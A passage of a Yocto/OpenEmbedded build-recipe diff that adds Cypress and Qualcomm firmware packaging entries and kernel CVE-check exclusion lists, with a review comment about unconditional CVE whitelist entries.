630FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.*" 680FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \
681 ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \
682"
631FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin" 683FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin"
632FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin" 684FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin"
633FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.bin" 685FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \
686 ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \
687"
634FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin" 688FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin"
635FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin" 689FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \
690 ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \
691"
636FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin" 692FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin"
637FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \ 693FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \
638 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \ 694 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \
@@ -703,13 +759,22 @@ LICENSE_${PN}-cypress-license = "Firmware-cypress"
703FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress" 759FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress"
704 760
705FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd" 761FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd"
706FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.*" 762FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \
707FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.*" 763 ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*"
708FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.*" 764FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \
709FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin" 765 ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*"
710FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.*" 766FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \
767 ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*"
768FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \
769 ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \
770"
771FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \
772 ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \
773"
711FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \ 774FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \
712 ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \ 775 ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \
776 ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \
777 ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.clm_blob \
713" 778"
714 779
715LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress" 780LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress"
@@ -909,27 +974,100 @@ RDEPENDS_${PN}-qat = "${PN}-qat-license"
909 974
910# For QCOM VPU/GPU and SDM845 975# For QCOM VPU/GPU and SDM845
911LICENSE_${PN}-qcom-license = "Firmware-qcom" 976LICENSE_${PN}-qcom-license = "Firmware-qcom"
977LICENSE_${PN}-qcom-yamato-license = "Firmware-qcom-yamato"
978LICENSE_${PN}-qcom-venus-1.8 = "Firmware-qcom"
979LICENSE_${PN}-qcom-venus-4.2 = "Firmware-qcom"
980LICENSE_${PN}-qcom-venus-5.2 = "Firmware-qcom"
981LICENSE_${PN}-qcom-venus-5.4 = "Firmware-qcom"
982LICENSE_${PN}-qcom-vpu-1.0 = "Firmware-qcom"
983LICENSE_${PN}-qcom-vpu-2.0 = "Firmware-qcom"
984LICENSE_${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato"
985LICENSE_${PN}-qcom-adreno-a3xx = "Firmware-qcom"
986LICENSE_${PN}-qcom-adreno-a4xx = "Firmware-qcom"
987LICENSE_${PN}-qcom-adreno-a530 = "Firmware-qcom"
988LICENSE_${PN}-qcom-adreno-a630 = "Firmware-qcom"
989LICENSE_${PN}-qcom-adreno-a650 = "Firmware-qcom"
990LICENSE_${PN}-qcom-adreno-a660 = "Firmware-qcom"
991LICENSE_${PN}-qcom-apq8016-modem = "Firmware-qcom"
992LICENSE_${PN}-qcom-apq8016-wifi = "Firmware-qcom"
993LICENSE_${PN}-qcom-apq8096-audio = "Firmware-qcom"
994LICENSE_${PN}-qcom-apq8096-adreno = "Firmware-qcom"
995LICENSE_${PN}-qcom-apq8096-modem = "Firmware-qcom"
996LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom"
997LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom"
998LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom"
999LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "Firmware-qcom"
1000LICENSE_${PN}-qcom-sdm845-audio = "Firmware-qcom"
1001LICENSE_${PN}-qcom-sdm845-adreno = "Firmware-qcom"
1002LICENSE_${PN}-qcom-sdm845-compute = "Firmware-qcom"
1003LICENSE_${PN}-qcom-sdm845-modem = "Firmware-qcom"
1004LICENSE_${PN}-qcom-sm8250-audio = "Firmware-qcom"
1005LICENSE_${PN}-qcom-sm8250-adreno = "Firmware-qcom"
1006LICENSE_${PN}-qcom-sm8250-compute = "Firmware-qcom"
1007
912FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt" 1008FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt"
1009FILES_${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato"
913FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*" 1010FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*"
914FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*" 1011FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*"
915FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*" 1012FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*"
916FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*" 1013FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*"
917FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw" 1014FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*"
918FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*" 1015FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*"
919FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*" 1016FILES_${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw"
1017FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a3*_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
1018FILES_${PN}-qcom-adreno-a4xx = "${nonarch_base_libdir}/firmware/qcom/a4*_*.fw"
1019FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*"
1020FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*"
1021FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*"
1022FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*"
1023FILES_${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn"
1024FILES_${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*"
1025FILES_${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt"
1026FILES_${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*"
1027FILES_${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn"
1028FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX"
1029FILES_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn"
1030FILES_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn"
1031FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*"
1032FILES_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*"
1033FILES_${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
920FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*" 1034FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*"
921FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*" 1035FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*"
922FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn" 1036FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn"
1037FILES_${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*"
1038FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*"
1039FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*"
923RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license" 1040RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license"
924RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license" 1041RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license"
925RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license" 1042RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license"
926RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license" 1043RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license"
927RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license" 1044RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license"
1045RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license"
1046RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license"
1047RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license"
1048RDEPENDS_${PN}-qcom-adreno-a4xx = "${PN}-qcom-license"
928RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license" 1049RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license"
929RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license" 1050RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license"
1051RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license"
1052RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license"
1053RDEPENDS_${PN}-qcom-apq8016-modem = "${PN}-qcom-license"
1054RDEPENDS_${PN}-qcom-apq8016-wifi = "${PN}-qcom-license"
1055RDEPENDS_${PN}-qcom-apq8096-audio = "${PN}-qcom-license"
1056RDEPENDS_${PN}-qcom-apq8096-modem = "${PN}-qcom-license"
1057RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license"
1058RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license"
1059RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license"
1060RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license"
930RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license" 1061RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license"
931RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license" 1062RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license"
932RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license" 1063RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license"
1064RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license"
1065RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license"
1066
1067RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
1068RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
1069RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
1070RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
933 1071
934FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio" 1072FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio"
935 1073
@@ -958,7 +1096,6 @@ LICENSE_${PN} = "\
958 & Firmware-fw_sst_0f28 \ 1096 & Firmware-fw_sst_0f28 \
959 & Firmware-go7007 \ 1097 & Firmware-go7007 \
960 & Firmware-hfi1_firmware \ 1098 & Firmware-hfi1_firmware \
961 & Firmware-i2400m \
962 & Firmware-ibt_firmware \ 1099 & Firmware-ibt_firmware \
963 & Firmware-it913x \ 1100 & Firmware-it913x \
964 & Firmware-IntcSST2 \ 1101 & Firmware-IntcSST2 \
@@ -979,7 +1116,6 @@ LICENSE_${PN} = "\
979 & Firmware-ralink-firmware \ 1116 & Firmware-ralink-firmware \
980 & Firmware-imx-sdma_firmware \ 1117 & Firmware-imx-sdma_firmware \
981 & Firmware-siano \ 1118 & Firmware-siano \
982 & Firmware-tda7706-firmware \
983 & Firmware-ti-connectivity \ 1119 & Firmware-ti-connectivity \
984 & Firmware-ti-keystone \ 1120 & Firmware-ti-keystone \
985 & Firmware-ueagle-atm4-firmware \ 1121 & Firmware-ueagle-atm4-firmware \
@@ -1012,3 +1148,6 @@ python populate_packages_prepend () {
1012# Firmware files are generally not ran on the CPU, so they can be 1148# Firmware files are generally not ran on the CPU, so they can be
1013# allarch despite being architecture specific 1149# allarch despite being architecture specific
1014INSANE_SKIP = "arch" 1150INSANE_SKIP = "arch"
1151
1152# Don't warn about already stripped files
1153INSANE_SKIP:${PN} = "already-stripped"
diff --git a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
index 4ad74a27e9..2d4429b6b4 100644
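--- a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
+++ b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
@@ -1,4 +1,6 @@
 SUMMARY = "Sanitized set of kernel headers for the C library's use"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Designed to maintain an Application Programming Interface (API) stable version of the Linux headers"
 SECTION = "devel"
 LICENSE = "GPLv2"
 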
diff --git a/meta/recipes-kernel/linux/cve-exclusion.inc b/meta/recipes-kernel/linux/cve-exclusion.inc
new file mode 100644
index 0000000000..efc8b09475
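--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion.inc
@@ -0,0 +1,13 @@
+# Kernel CVE exclusion file
+
+# https://nvd.nist.gov/vuln/detail/CVE-2020-29373
+# Patched in kernel since v5.6 ff002b30181d30cdfbca316dadd099c3ca0d739c
+# Backported in version v5.4.24 cac68d12c531aa3010509a5a55a5dfd18dedaa80
+CVE_CHECK_WHITELIST += "CVE-2020-29373"
+
+# https://nvd.nist.gov/vuln/detail/CVE-2022-39188
+# Patched in kernel since v5.19 b67fbebd4cf980aecbcc750e1462128bffe8ae15
+# Backported in version v5.4.212 c9c5501e815132530d741ec9fdd22657f91656bc
+# Backported in version v5.10.141 895428ee124ad70b9763259308354877b725c31d
+# Backported in version v5.15.65 3ffb97fce282df03723995f5eed6a559d008078e
+CVE_CHECK_WHITELIST += "CVE-2022-39188"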
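Review bot: Both `CVE_CHECK_WHITELIST +=` entries are unconditional, so any kernel recipe that includes this file drops CVE-2020-29373 and CVE-2022-39188 from cve-check output whatever version is actually built. The comments tie the fixes to specific stable releases (v5.4.24 and v5.4.212 on the 5.4 series), but nothing in the file compares them with `LINUX_VERSION`, whereas the generated cve-exclusion_5.4.inc added alongside it warns when the kernel version differs from the one it was generated for. Which recipes include this file is not visible here, so the exposure is inferred; a recipe pinned below those releases would report the CVEs as handled while unpatched. I would add a header comment such as `# Valid only for kernels at or above the backport version listed for each entry; do not include from recipes pinned to older stable releases`, or move the entries into the per-version exclusion files so the existing version warning covers them.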
diff --git a/meta/recipes-kernel/linux/cve-exclusion_5.4.inc b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
new file mode 100644
index 0000000000..b0b33bcc1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
@@ -0,0 +1,9445 @@
1
2# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
3# Generated at 2024-04-14 04:45:05.585211 for version 5.4.273
4
5python check_kernel_cve_status_version() {
6 this_version = "5.4.273"
7 kernel_version = d.getVar("LINUX_VERSION")
8 if kernel_version != this_version:
9 bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
10}
11do_cve_check[prefuncs] += "check_kernel_cve_status_version"
12
13# fixed-version: Fixed after version 2.6.12rc2
14CVE_CHECK_WHITELIST += "CVE-2003-1604"
15
16# fixed-version: Fixed after version 3.6rc1
17CVE_CHECK_WHITELIST += "CVE-2004-0230"
18
19# CVE-2005-3660 has no known resolution
20
21# fixed-version: Fixed after version 2.6.26rc5
22CVE_CHECK_WHITELIST += "CVE-2006-3635"
23
24# fixed-version: Fixed after version 2.6.19rc3
25CVE_CHECK_WHITELIST += "CVE-2006-5331"
26
27# fixed-version: Fixed after version 2.6.19rc2
28CVE_CHECK_WHITELIST += "CVE-2006-6128"
29
30# CVE-2007-3719 has no known resolution
31
32# fixed-version: Fixed after version 2.6.12rc2
33CVE_CHECK_WHITELIST += "CVE-2007-4774"
34
35# fixed-version: Fixed after version 2.6.24rc6
36CVE_CHECK_WHITELIST += "CVE-2007-6761"
37
38# fixed-version: Fixed after version 2.6.20rc5
39CVE_CHECK_WHITELIST += "CVE-2007-6762"
40
41# CVE-2008-2544 has no known resolution
42
43# CVE-2008-4609 has no known resolution
44
45# fixed-version: Fixed after version 2.6.25rc1
46CVE_CHECK_WHITELIST += "CVE-2008-7316"
47
48# fixed-version: Fixed after version 2.6.31rc6
49CVE_CHECK_WHITELIST += "CVE-2009-2692"
50
51# fixed-version: Fixed after version 2.6.23rc9
52CVE_CHECK_WHITELIST += "CVE-2010-0008"
53
54# fixed-version: Fixed after version 2.6.36rc5
55CVE_CHECK_WHITELIST += "CVE-2010-3432"
56
57# CVE-2010-4563 has no known resolution
58
59# fixed-version: Fixed after version 2.6.37rc6
60CVE_CHECK_WHITELIST += "CVE-2010-4648"
61
62# fixed-version: Fixed after version 2.6.38rc1
63CVE_CHECK_WHITELIST += "CVE-2010-5313"
64
65# CVE-2010-5321 has no known resolution
66
67# fixed-version: Fixed after version 2.6.35rc1
68CVE_CHECK_WHITELIST += "CVE-2010-5328"
69
70# fixed-version: Fixed after version 2.6.39rc1
71CVE_CHECK_WHITELIST += "CVE-2010-5329"
72
73# fixed-version: Fixed after version 2.6.34rc7
74CVE_CHECK_WHITELIST += "CVE-2010-5331"
75
76# fixed-version: Fixed after version 2.6.37rc1
77CVE_CHECK_WHITELIST += "CVE-2010-5332"
78
79# fixed-version: Fixed after version 3.2rc1
80CVE_CHECK_WHITELIST += "CVE-2011-4098"
81
82# fixed-version: Fixed after version 3.3rc1
83CVE_CHECK_WHITELIST += "CVE-2011-4131"
84
85# fixed-version: Fixed after version 3.2rc1
86CVE_CHECK_WHITELIST += "CVE-2011-4915"
87
88# CVE-2011-4916 has no known resolution
89
90# CVE-2011-4917 has no known resolution
91
92# fixed-version: Fixed after version 3.2rc1
93CVE_CHECK_WHITELIST += "CVE-2011-5321"
94
95# fixed-version: Fixed after version 3.1rc1
96CVE_CHECK_WHITELIST += "CVE-2011-5327"
97
98# fixed-version: Fixed after version 3.7rc2
99CVE_CHECK_WHITELIST += "CVE-2012-0957"
100
101# fixed-version: Fixed after version 3.5rc1
102CVE_CHECK_WHITELIST += "CVE-2012-2119"
103
104# fixed-version: Fixed after version 3.5rc1
105CVE_CHECK_WHITELIST += "CVE-2012-2136"
106
107# fixed-version: Fixed after version 3.5rc2
108CVE_CHECK_WHITELIST += "CVE-2012-2137"
109
110# fixed-version: Fixed after version 3.4rc6
111CVE_CHECK_WHITELIST += "CVE-2012-2313"
112
113# fixed-version: Fixed after version 3.4rc6
114CVE_CHECK_WHITELIST += "CVE-2012-2319"
115
116# fixed-version: Fixed after version 3.13rc4
117CVE_CHECK_WHITELIST += "CVE-2012-2372"
118
119# fixed-version: Fixed after version 3.4rc1
120CVE_CHECK_WHITELIST += "CVE-2012-2375"
121
122# fixed-version: Fixed after version 3.5rc1
123CVE_CHECK_WHITELIST += "CVE-2012-2390"
124
125# fixed-version: Fixed after version 3.5rc4
126CVE_CHECK_WHITELIST += "CVE-2012-2669"
127
128# fixed-version: Fixed after version 2.6.34rc1
129CVE_CHECK_WHITELIST += "CVE-2012-2744"
130
131# fixed-version: Fixed after version 3.4rc3
132CVE_CHECK_WHITELIST += "CVE-2012-2745"
133
134# fixed-version: Fixed after version 3.5rc6
135CVE_CHECK_WHITELIST += "CVE-2012-3364"
136
137# fixed-version: Fixed after version 3.4rc5
138CVE_CHECK_WHITELIST += "CVE-2012-3375"
139
140# fixed-version: Fixed after version 3.5rc5
141CVE_CHECK_WHITELIST += "CVE-2012-3400"
142
143# fixed-version: Fixed after version 3.6rc2
144CVE_CHECK_WHITELIST += "CVE-2012-3412"
145
146# fixed-version: Fixed after version 3.6rc1
147CVE_CHECK_WHITELIST += "CVE-2012-3430"
148
149# fixed-version: Fixed after version 2.6.19rc4
150CVE_CHECK_WHITELIST += "CVE-2012-3510"
151
152# fixed-version: Fixed after version 3.5rc6
153CVE_CHECK_WHITELIST += "CVE-2012-3511"
154
155# fixed-version: Fixed after version 3.6rc3
156CVE_CHECK_WHITELIST += "CVE-2012-3520"
157
158# fixed-version: Fixed after version 3.0rc1
159CVE_CHECK_WHITELIST += "CVE-2012-3552"
160
161# Skipping CVE-2012-4220, no affected_versions
162
163# Skipping CVE-2012-4221, no affected_versions
164
165# Skipping CVE-2012-4222, no affected_versions
166
167# fixed-version: Fixed after version 3.4rc1
168CVE_CHECK_WHITELIST += "CVE-2012-4398"
169
170# fixed-version: Fixed after version 2.6.36rc4
171CVE_CHECK_WHITELIST += "CVE-2012-4444"
172
173# fixed-version: Fixed after version 3.7rc6
174CVE_CHECK_WHITELIST += "CVE-2012-4461"
175
176# fixed-version: Fixed after version 3.6rc5
177CVE_CHECK_WHITELIST += "CVE-2012-4467"
178
179# fixed-version: Fixed after version 3.7rc3
180CVE_CHECK_WHITELIST += "CVE-2012-4508"
181
182# fixed-version: Fixed after version 3.8rc1
183CVE_CHECK_WHITELIST += "CVE-2012-4530"
184
185# CVE-2012-4542 has no known resolution
186
187# fixed-version: Fixed after version 3.7rc4
188CVE_CHECK_WHITELIST += "CVE-2012-4565"
189
190# fixed-version: Fixed after version 3.8rc1
191CVE_CHECK_WHITELIST += "CVE-2012-5374"
192
193# fixed-version: Fixed after version 3.8rc1
194CVE_CHECK_WHITELIST += "CVE-2012-5375"
195
196# fixed-version: Fixed after version 3.6rc1
197CVE_CHECK_WHITELIST += "CVE-2012-5517"
198
199# fixed-version: Fixed after version 3.6rc7
200CVE_CHECK_WHITELIST += "CVE-2012-6536"
201
202# fixed-version: Fixed after version 3.6rc7
203CVE_CHECK_WHITELIST += "CVE-2012-6537"
204
205# fixed-version: Fixed after version 3.6rc7
206CVE_CHECK_WHITELIST += "CVE-2012-6538"
207
208# fixed-version: Fixed after version 3.6rc3
209CVE_CHECK_WHITELIST += "CVE-2012-6539"
210
211# fixed-version: Fixed after version 3.6rc3
212CVE_CHECK_WHITELIST += "CVE-2012-6540"
213
214# fixed-version: Fixed after version 3.6rc3
215CVE_CHECK_WHITELIST += "CVE-2012-6541"
216
217# fixed-version: Fixed after version 3.6rc3
218CVE_CHECK_WHITELIST += "CVE-2012-6542"
219
220# fixed-version: Fixed after version 3.6rc3
221CVE_CHECK_WHITELIST += "CVE-2012-6543"
222
223# fixed-version: Fixed after version 3.6rc3
224CVE_CHECK_WHITELIST += "CVE-2012-6544"
225
226# fixed-version: Fixed after version 3.6rc3
227CVE_CHECK_WHITELIST += "CVE-2012-6545"
228
229# fixed-version: Fixed after version 3.6rc3
230CVE_CHECK_WHITELIST += "CVE-2012-6546"
231
232# fixed-version: Fixed after version 3.6rc1
233CVE_CHECK_WHITELIST += "CVE-2012-6547"
234
235# fixed-version: Fixed after version 3.6rc1
236CVE_CHECK_WHITELIST += "CVE-2012-6548"
237
238# fixed-version: Fixed after version 3.6rc1
239CVE_CHECK_WHITELIST += "CVE-2012-6549"
240
241# fixed-version: Fixed after version 3.3rc1
242CVE_CHECK_WHITELIST += "CVE-2012-6638"
243
244# fixed-version: Fixed after version 3.6rc2
245CVE_CHECK_WHITELIST += "CVE-2012-6647"
246
247# fixed-version: Fixed after version 3.6
248CVE_CHECK_WHITELIST += "CVE-2012-6657"
249
250# fixed-version: Fixed after version 3.6rc5
